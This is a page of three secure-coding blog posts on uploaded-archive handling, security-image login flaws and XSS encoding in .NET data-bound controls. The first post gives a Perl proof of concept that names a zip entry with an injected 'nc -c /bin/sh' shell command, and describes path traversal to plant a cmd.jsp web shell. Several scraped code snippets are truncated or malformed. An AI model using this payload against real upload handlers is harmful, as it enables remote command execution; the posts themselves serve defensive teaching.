RSS Feed

Entries in Secure Coding (3)


Handling Uploaded Archives Securely

Insecure handling of file uploads is one of my favorite issues to test for during web application security assessments. They often provide exploitable attack vectors for compromising the server, application and/or end-user. In this post, I focus on insecure handling of uploaded archive files ' something I've seen repeatedly. From my experience, most of the applications vulnerable to this flaw do a fairly good job vetting the uploaded file itself, but fail to apply the same scrutiny to the packaged files. Consider the following PHP code snippet:

Example 1:

if (isFileValidArchive())
$files = getSortedListOfFilesFromValidatedArchive();

foreach ($files as $filename)
$ext = substr($filename, strrpos($filename, '.') + 1);
//only handle .doc files
if ($ext == "doc")
$cmd = "/usr/bin/unzip -j -o " .
. "\"" . $filename . "\" -d /tmp/uploads";
// process results

The $filename variable holds the name of a packaged file (such as "somefile.doc") retrieved from an uploaded archive. As usual, blind trust of user-supplied input (i.e. the name of a file packaged within a user uploaded .zip file) creates an exploitable attack vector ' in this case, arbitrary command execution. Given the attacker's operating system is likely to prevent certain special characters within a file name, how is this exploitable?

For example, the characters < > : " / \ | ? * are typically forbidden by MS Windows operating systems. These same characters are often useful for manipulating command strings.

To answer the question above, zip compression libraries are a good solution because they provide functionality to create and package archives in memory, which are obviously not bound by OS file system constraints. Allowing special characters in a file name is likely not an oversight as it appears in line with the .ZIP File Format Specification. It's also worth noting that the spec permits the use of alternate character encodings, which could be leveraged by an attacker to bypass potential blacklist filtering mechanisms. The following Perl script uses this zip compression library to exploit the command injection flaw in Example 1.

use chilkat;

# Create a .zip archive in-memory
$zip = new chilkat::CkZip();
$zip->UnlockComponent("anything for 30-day trial");

# Package a file with a malicious file name
$zip->AppendString("foo\" & nc -c /bin/sh 8888 & \"bar.doc","junk");

From a security code review perspective, the use of the PHP exec() function in Example 1 should be an immediate red flag (whether you are a security auditor or a developer). In general, shelling out to perform OS commands is never a good idea, especially if the command potentially contains user input.

A safer alternative when building applications could be native or 3rd party zip compression APIs, such as PHP Zip File Extensions or the Java package However, even when these are used, developers still find a way to do it insecurely. Consider Example 2 which is a code snippet from a J2EE web application:

Example 2:

ZipFile zipFile = new ZipFile(uploadedZipFile);

Enumeration<? extends ZipEntry> zipEntries = zipFile.entries();
while (zipEntries.hasMoreElements())
ZipEntry zipEntry = zipEntries.nextElement();
File packagedFile = new File("/tmp/uploads", zipEntry.getName());
// Create "packagedFile" on file system and
// Copy contents of "zipEntry" into it

Again, the attacker controls everything within the zip file. Embedding characters such as ../ into the name of the packaged file, an attacker could traverse out of "/tmp/uploads" and force the application to write the packaged file into any location, such as the web root directory. A simple "cmd.jsp" file would allow the attacker to execute arbitrary commands on the web server.

How can developers harden their applications so they are not vulnerable to similar mistakes? First, ensure the application is secured with appropriate server-side controls when handling file uploads, i.e.

  • maximum file size enforcement
  • file type and format restrictions
  • random filename assignment
  • virus scanning
  • storing the file into a non-web accessible directory
  • etc, etc, etc

If archive files are permitted, ensure the same level of stringent validation is also applied to packaged files and, most importantly, never trust user-supplied data elements (such as file names or other file attributes) when determining where and how a file will be stored on the file system.


Yet Another Flawed Authentication Scheme

It seems like every day I hear about a new web-based authentication technique intended to enhance user security and/or thwart phishing scams. This is especially common in the banking world, where most applications are starting to use strong two-factor authentication. Unfortunately for most of the larger consumer web applications, implementing strong multi-factor authentication (i.e. Smart-cards or SecureID) is just not cost effective or practical when you have several million users. As a result, these applications must resort to other creative ways to strengthen their authentication.

One increasingly popular practice is the use of security images (known as "watermarks") to thwart phishing scams. For those not familiar with this concept (generically known as site-to-user authentication), it's supposed to like this:

During registration, the user selects (or is assigned) a specific image. The image is one of potentially hundreds of possible images and is intended to help user distinguish the real web-site from an impostor. The actual act of authenticating to the website is split into the following three steps:

  • Step 1: The user submits their username (only) to the website
  • Step 2: The website shows the user their personal "watermark" image, allowing them to verify that they are at the correct site.
  • Step 3: If the watermark image is correct, the user should enter his/her password to complete the login process. If the watermark image is not correct (or not shown), the user should not proceed as they are likely not at the correct website.

The general concept is pretty simple, and was pioneered by PassMark (acquired by RSA/EMC) several years ago. The concept (and PassMark) has been the subject of much scrutiny by both the FFIEC and security researchers in recent years, who have even published papers outlining various ways in which this scheme can be abused and subverted. What I find most interesting is that, in addition to all of the potential technical flaws that have been identified with Passmark (and similar concepts), it seems to suffer from an even more critical and fundamental flaw ' that most users just don't understand it.

A study published earlier this year found that 97% of people who use an image oriented site-to-user authentication scheme (as described above) still provided their password to an imposter website even though the correct security image was not shown. Even worse, it seems that some of the companies who implement this authentication scheme don't completely understand it. Consider the following real-life example:

Like many folks this holiday season, I found myself at a department store checkout counter faced with the question that every retail clerk is programmed to ask ("Would you like to save an additional 15% today by opening up a new credit card?"). Normally I decline this offer while the clerk is in mid-sentence; however, on this day I proceeded to open an account.

A few days later, I went online to pay my bill and quickly noticed the site touting its *high security* (this seems to be the marketing norm these days). During the registration process, the site forced me to pick a "Security Image" that is used to protect me from phishing scams (ala PassMark). Knowing how this process is supposed to work, you can imagine my surprise when my subsequent login to the website looked like this:

Screen 1: Login Screen (requesting user-name and password)

Login Page

Screen 2: After authentication (displays my security image)

After Login

What's wrong with these pictures? Unfortunately they don't show me my security image until after I have completely authenticated to the website (instead of before I provided my password)! Clearly there seems to be a lack of understanding and/or education somewhere on the other side.

A quick survey of some non-technical friends and relatives during the holidays also served to further confirm my suspicions. While all of them use at least one banking/bill-pay website that incorporates the use of a security image ("Oh yea, I have a special picture that they show me every time I log in"), not one of them could explain what the image was for or even whether it gets shown to them before or after they provide their password.

The takeaway here is that (not surprisingly) end-user awareness still, and likely always will be, a fundamental component to the success of any good security measure. There is little point in implementing a new security mechanism (especially one that depends on the user understanding it) unless the appropriate steps have been taken to ensure that everyone has been properly educated.


.NET Data-bound Web controls & (anti)XSS - Some Considerations

We spend a lot of time helping clients fix XSS exposures as part of our secure remediation services. One common trend we observe repeatedly (and that triggered this posting today) revolves around the seemingly subconscious trust placed on data pulled from backend databases combined with a primary misconception around the use of many of the .NET data-bound controls.

Often, it is not understood where the majority of data used by an application originates from, and whether it was adequately vetted before being stored. Typically, many different applications, both Internet and Intranet facing, will all populate and pull from the same series of databases. Potentially tainted data retrieved is then often simply displayed by the consuming web application thus exposing unsuspecting users to XSS attack vectors.

Inconsistent .NET Data-bound control Encoding?!?

Unfortunately with regard to XSS, no encoding is performed by many of the .NET Data-bound controls (i.e. the DataGrid, DataList, RadioButtonList and CheckBoxList) when displaying data retrieved from a dynamic data source.

Subsequently, this has become a common trap in that the encoding for certain controls is the responsibility of the developer and the encoding requirements often vary for each control. This information has only been recently captured in the May 8, 2007 "Comments and Corrections" addendum of the superb Microsoft Patterns & Practices book Improving Web Application Security: Threats and Countermeasures, where the following valid recommendations are made complete with excellent code examples (which I build upon slightly below):

"For example, for a DataGrid control, you have the following options:

  • Turn all columns into templates and manually use HtmlEncode()/UrlEncode() on each call to DataBinder.Eval
  • Override one of its DataBinding methods, such as OnDatabinding or OnItemDataBound and perform encoding on its items."

HtmlEncode/UrlEncode vs. the Microsoft Anti-Cross Site Scripting Library

The classic solution to fixing/preventing XSS has been to employ the use of the HtmlEncode/UrlEncode utilities (as above) to encode values before they are rendered to users. However the use of Microsoft Anti-Cross Site Scripting Library (currently v1.5) should warrant some heavy consideration to provide enhanced XSS protection for .NET applications. This library basically provides superior protection by encoding everything except a small set of "known safe" characters. This white-list approach is considered inherently more secure when compared against the classic HtmlEncode and UrlEncode utilities which encode only known bad items. As there seems to be no end of creative and new ways of exploiting XSS this tightened protection should be very appealing in .NET environments as part of a multilayer defensive approach. (Remember never to rely on a single security control; as it will nearly always be by-passable under certain conditions).

A prime example of how Version 1.5 of Microsoft Anti-Cross Site Scripting Library provides greater protection against XSS is illustrated via the availability of its JavaScriptEncode Encoding Method to protect vulnerable application values that are used directly within existing JavaScript blocks. Such values would still be vulnerable to XSS if they were only subjected to encoding via the classic HtmlEncode/UrlEncode utilities. (The XML Encoding methods XmlEncode and XmlAttributeEncode are also very useful as well). For those who require further information (or are rightly sceptical), the Microsoft ACE Team has an excellent description of the v1.5 enhancements, complete with tutorial, (which has also been endorsed by Microsoft Security leader Michael Howard). If you're interested in seeing what's going on under the hood ' examine the component yourself via Lutz Roeder's Reflector tool as did Microsoft's David Coe with an earlier version (among others).

Leveraging AntiXss and DataBinder.Eval to prevent DataGrid XSS

The following example pseudo code shows how the Microsoft Anti-Cross Site Scripting Library could be used manually on each call to DataBinder.Eval to prevent potential XSS exposure.

Pseudo code example 1:

  <asp:datagrid id="grdFoo" CssClass="gridheader" runat="server"
<a name="fooUrl" href='<%#AntiXss.HtmlAttributeEncode

Leveraging OnItemDataBound and AntiXss to prevent DataGrid XSS

The OnItemDataBound method provides the final opportunity to encode the data item to prevent any XSS before it is rendered to the remote user via the ItemDataBound event. The Microsoft Anti-Cross Site Scripting Library could be leveraged by the OnItemDataBound method at this point to encode all data items.

Pseudo code example 2:

  <asp:datagrid id="grdFoo" CssClass="gridheader" runat="server"


protected void grdFoo_ItemDataBound(object sender,
DataGridItemEventArgs e)

foreach (TableCell tc in e.Item.Cells)
if (!string.IsNullOrEmpty(tc.Text) &&
tc.Text = AntiXss.HtlmEncode(tc.Text);

(Note - be careful not to double encode any &nbsp; values and blow out the control)